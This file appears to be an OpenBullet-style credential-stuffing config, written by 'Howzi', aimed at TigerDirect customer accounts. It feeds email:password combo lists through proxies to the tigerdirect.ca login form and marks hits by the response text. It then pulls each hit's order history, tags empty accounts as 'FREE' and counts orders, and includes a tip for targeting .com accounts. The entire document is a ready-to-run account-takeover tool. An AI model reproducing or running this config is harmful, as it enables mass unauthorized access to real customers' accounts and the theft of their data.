[SETTINGS]
{
  "Name": "TigerDirect",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-05-20T20:12:19.3973577-04:00",
  "AdditionalInfo": "Free = accounts with empty order history , change .ca to .com in REQUEST blocks to check .com accounts",
  "Author": "Howzi",
  "Version": "1.1.2",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#login REQUEST POST "https://www.tigerdirect.ca/secure/OrderLogin.asp" 
  CONTENT "PG=1&email=<USER>&password=<PASS>&formSubmit=1&rf=&rurl=&SubmitFlag=YES&imageField.x=0&imageField.y=0" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)" 
  HEADER "Accept: */*" 

#key_check KEYCHECK 
  KEYCHAIN Success OR 
    KEY "YOUR ACCOUNT" 
  KEYCHAIN Failure OR 
    KEY "Invalid email address or password." 

#get_order_history REQUEST GET "https://www.tigerdirect.ca/cgisec/orderHistory.asp" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)" 
  HEADER "Accept: */*" 

#order_check KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "No orders found..." 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "No orders found..." 

#count_orders FUNCTION CountOccurrences "sm_text" "<SOURCE>" -> CAP "Number of Orders" 

